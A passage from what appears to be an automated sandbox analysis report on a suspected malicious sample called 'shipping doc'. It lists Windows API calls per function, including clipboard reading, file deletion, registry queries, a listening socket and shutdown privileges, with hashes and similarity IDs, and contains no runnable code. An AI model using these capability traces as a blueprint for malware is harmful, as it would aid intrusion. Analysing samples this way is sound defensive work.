                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0015EB87
                                                                                              • CloseClipboard.USER32 ref: 0015EB91
                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0015EBBC
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0015EBC9
                                                                                              • GetClipboardData.USER32(00000001), ref: 0015EBD1
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0015EBE2
                                                                                              • GlobalUnlock.KERNEL32(00000000,?), ref: 0015EC22
                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0015EC38
                                                                                              • GetClipboardData.USER32(0000000F), ref: 0015EC44
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0015EC55
                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0015EC77
                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0015EC94
                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0015ECD2
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0015ECF3
                                                                                              • CountClipboardFormats.USER32 ref: 0015ED14
                                                                                              • CloseClipboard.USER32 ref: 0015ED59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                              • String ID:
                                                                                              • API String ID: 420908878-0
                                                                                              • Opcode ID: 1a58810dbee7090fdf74dae894697924657a5e6551ad99b0beabf09141fdf016
                                                                                              • Instruction ID: 933939f9ad4451e1e76c560dcaa52aaa0b1e6b669eb440d6f46532154061ca78
                                                                                              • Opcode Fuzzy Hash: 1a58810dbee7090fdf74dae894697924657a5e6551ad99b0beabf09141fdf016
                                                                                              • Instruction Fuzzy Hash: 4261D234604201DFD318EF64D888F6A77F4AF84715F14455DF86A9B2A2CB31DE89CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001569BE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00156A12
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00156A4E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00156A75
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00156AB2
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00156ADF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                              • API String ID: 3830820486-3289030164
                                                                                              • Opcode ID: 3762f1e9a650d4f24b5e8fd83a3c4f55d8be6ba6445eafe2e8adea8133535368
                                                                                              • Instruction ID: 3d8a10aed412e10eb8cc9588382054700b9cbd071cbe5a8b78ea7da03c2eb860
                                                                                              • Opcode Fuzzy Hash: 3762f1e9a650d4f24b5e8fd83a3c4f55d8be6ba6445eafe2e8adea8133535368
                                                                                              • Instruction Fuzzy Hash: E8D173715083409EC314EB65C881EAFB7ECAF88704F44491DF999D7152EB34DA48C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00159663
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 001596A1
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 001596BB
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001596D3
                                                                                              • FindClose.KERNEL32(00000000), ref: 001596DE
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 001596FA
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0015974A
                                                                                              • SetCurrentDirectoryW.KERNEL32(001A6B7C), ref: 00159768
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00159772
                                                                                              • FindClose.KERNEL32(00000000), ref: 0015977F
                                                                                              • FindClose.KERNEL32(00000000), ref: 0015978F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: a8fa11b7a22afacff2d196fbf529f57a8fa51a1ff794c169000584f911b01118
                                                                                              • Instruction ID: f4e0083da995c66b74711c757122da87cea38fc89fa9e5aedf8b9e5e3c77b0a7
                                                                                              • Opcode Fuzzy Hash: a8fa11b7a22afacff2d196fbf529f57a8fa51a1ff794c169000584f911b01118
                                                                                              • Instruction Fuzzy Hash: 3831F536501209EEDB14AFB4DC08ADE77BCAF09321F14405AF828E6091DB34DEC88EA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 001597BE
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00159819
                                                                                              • FindClose.KERNEL32(00000000), ref: 00159824
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00159840
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00159890
                                                                                              • SetCurrentDirectoryW.KERNEL32(001A6B7C), ref: 001598AE
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001598B8
                                                                                              • FindClose.KERNEL32(00000000), ref: 001598C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 001598D5
                                                                                                • Part of subcall function 0014DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0014DB00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2640511053-438819550
                                                                                              • Opcode ID: 0f97985aaa97bed6210bf4c46f8654079490311320629b67aff107a1e5accaff
                                                                                              • Instruction ID: 28d3c6ae303d8d663d0d52e2b94d3054b6d5d252b063782b957359245c2d8eea
                                                                                              • Opcode Fuzzy Hash: 0f97985aaa97bed6210bf4c46f8654079490311320629b67aff107a1e5accaff
                                                                                              • Instruction Fuzzy Hash: 1031C33150121DEADF10AFB4EC48ADE77BDAF06321F148159E864A61D1DB70DA888F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0016C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0016B6AE,?,?), ref: 0016C9B5
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016C9F1
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA68
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0016BF3E
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0016BFA9
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016BFCD
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0016C02C
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0016C0E7
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0016C154
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0016C1E9
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0016C23A
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0016C2E3
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0016C382
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016C38F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 3102970594-0
                                                                                              • Opcode ID: 580a9cc0d0a19deb5447a6c5899cfc72c753476f673ad452542ae546901175e4
                                                                                              • Instruction ID: c5c744a39be2ba100c58dfabb223356502e939cdcc0e1deb79e8074e5b0a3a92
                                                                                              • Opcode Fuzzy Hash: 580a9cc0d0a19deb5447a6c5899cfc72c753476f673ad452542ae546901175e4
                                                                                              • Instruction Fuzzy Hash: 28025C716042409FD714CF28C895E2ABBE5FF89304F18849DF88ADB2A2DB31ED55CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00158257
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00158267
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00158273
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00158310
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00158324
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00158356
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0015838C
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00158395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1464919966-438819550
                                                                                              • Opcode ID: bb11ec864318d9140f6b46a15b19b844a0a7aa45e71f77bf6b9d616b15e86e5a
                                                                                              • Instruction ID: 9cf338869dcd9352c98bb68aa42cf9a3c381ea2ee2615c1e9b1fcff45c336c49
                                                                                              • Opcode Fuzzy Hash: bb11ec864318d9140f6b46a15b19b844a0a7aa45e71f77bf6b9d616b15e86e5a
                                                                                              • Instruction Fuzzy Hash: E3616B725047459FC710EF60C8419AFB3E8FF89315F04892EF9A9A7251DB31E949CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E3A97,?,?,000E2E7F,?,?,?,00000000), ref: 000E3AC2
                                                                                                • Part of subcall function 0014E199: GetFileAttributesW.KERNEL32(?,0014CF95), ref: 0014E19A
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014D122
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0014D1DD
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0014D1F0
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0014D20D
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014D237
                                                                                                • Part of subcall function 0014D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0014D21C,?,?), ref: 0014D2B2
                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0014D253
                                                                                              • FindClose.KERNEL32(00000000), ref: 0014D264
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1946585618-1173974218
                                                                                              • Opcode ID: c42bf0cf3e231a1cd7b6760aec4f04a2293fc92fc4daec297d81d112e173c3e3
                                                                                              • Instruction ID: ba9680b8d7bd2592a054c34ca3c03e7e260a18f66abef2787d91f8da450a73fb
                                                                                              • Opcode Fuzzy Hash: c42bf0cf3e231a1cd7b6760aec4f04a2293fc92fc4daec297d81d112e173c3e3
                                                                                              • Instruction Fuzzy Hash: B061793180114DAECF15EBA1EA92DEDBBB5AF55300F644069E406771A2EF30AF49CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: d1faa9bdd36990ac1d00b797dac3509aa404c702702ee1642acb866b1d77bf14
                                                                                              • Instruction ID: 40f4d8b6c993221e30e2b4015bb55a3007017ac9bc26230260dbeb240e56416a
                                                                                              • Opcode Fuzzy Hash: d1faa9bdd36990ac1d00b797dac3509aa404c702702ee1642acb866b1d77bf14
                                                                                              • Instruction Fuzzy Hash: 04419B31604611EFE724DF15D889B19BBF1EF44329F14809DE8298FAA2C771ED86CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 001416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0014170D
                                                                                                • Part of subcall function 001416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0014173A
                                                                                                • Part of subcall function 001416C3: GetLastError.KERNEL32 ref: 0014174A
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0014E932
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-3163812486
                                                                                              • Opcode ID: 7fce46e6820be3a3a2e6d02bf7c21e5760f101f7ea9317578744461f9c05f1f8
                                                                                              • Instruction ID: 10402e17ab9fbbffcadb9c3e37c66debe0770f363cf151d63bba47f25726d4d7
                                                                                              • Opcode Fuzzy Hash: 7fce46e6820be3a3a2e6d02bf7c21e5760f101f7ea9317578744461f9c05f1f8
                                                                                              • Instruction Fuzzy Hash: 1C01D673610211BBEB6426B8DC86BBF72ECB714758F160825F806E21F2D7A15C8086D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00161276
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161283
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 001612BA
                                                                                              • WSAGetLastError.WSOCK32 ref: 001612C5
                                                                                              • closesocket.WSOCK32(00000000), ref: 001612F4
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00161303
                                                                                              • WSAGetLastError.WSOCK32 ref: 0016130D
                                                                                              • closesocket.WSOCK32(00000000), ref: 0016133C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 540024437-0
                                                                                              • Opcode ID: 5267fa7415b22b81db95271a22965bc07827cad91fe1e8945b505eb2f0792845
                                                                                              • Instruction ID: 68fb84fada0602708612f6d587c67ce94447a2312fbea0764bcfc0defc2877dc
                                                                                              • Opcode Fuzzy Hash: 5267fa7415b22b81db95271a22965bc07827cad91fe1e8945b505eb2f0792845
                                                                                              • Instruction Fuzzy Hash: 39416031600140AFD714DF64C894B6ABBE6BF46318F2C819CE85A9F296C771ED81CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E3A97,?,?,000E2E7F,?,?,?,00000000), ref: 000E3AC2
                                                                                                • Part of subcall function 0014E199: GetFileAttributesW.KERNEL32(?,0014CF95), ref: 0014E19A
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014D420
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0014D470
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014D481
                                                                                              • FindClose.KERNEL32(00000000), ref: 0014D498
                                                                                              • FindClose.KERNEL32(00000000), ref: 0014D4A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 46bc29d61095fe1582df6c61ac6413117ea6b84275c97681c00e7f4b512a1d1c
                                                                                              • Instruction ID: a8dfbf0061a108c48b16b6cc22d8cf51bc43e9db379fc19a87da169bfa644b3f
                                                                                              • Opcode Fuzzy Hash: 46bc29d61095fe1582df6c61ac6413117ea6b84275c97681c00e7f4b512a1d1c
                                                                                              • Instruction Fuzzy Hash: 113170710083819FC704EF65D8558EFB7A8BF96314F844A1DF4D5631A2EB20AA49C763
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 2186690f00621c7ddee5dbb37690a1bb252e71baa0446fab25bf1ce7486fd2c2
                                                                                              • Instruction ID: 3ea46f96564e637c9f96ecca9b0add48fb01489a29fceab4cc99faaa8181a716
                                                                                              • Opcode Fuzzy Hash: 2186690f00621c7ddee5dbb37690a1bb252e71baa0446fab25bf1ce7486fd2c2
                                                                                              • Instruction Fuzzy Hash: AAC22B71E086298FDB69CE689D447E9B7B5EB48304F1541FAD84DE7280E774AEC28F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 001564DC
                                                                                              • CoInitialize.OLE32(00000000), ref: 00156639
                                                                                              • CoCreateInstance.OLE32(0017FCF8,00000000,00000001,0017FB68,?), ref: 00156650
                                                                                              • CoUninitialize.OLE32 ref: 001568D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: 477b692c760e1d1d87bf8dfdb5d93404edf59e963e54229cc2d379d7e4b4c721
                                                                                              • Instruction ID: d488510c12cda7f8804f6458b0d04d93b29efd26cd3ce521803e817b01cb3933
                                                                                              • Opcode Fuzzy Hash: 477b692c760e1d1d87bf8dfdb5d93404edf59e963e54229cc2d379d7e4b4c721
                                                                                              • Instruction Fuzzy Hash: ACD158715082419FC314EF24C8819ABB7E8FF94304F50496DF5959B2A2EB71EE4ACB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 001622E8
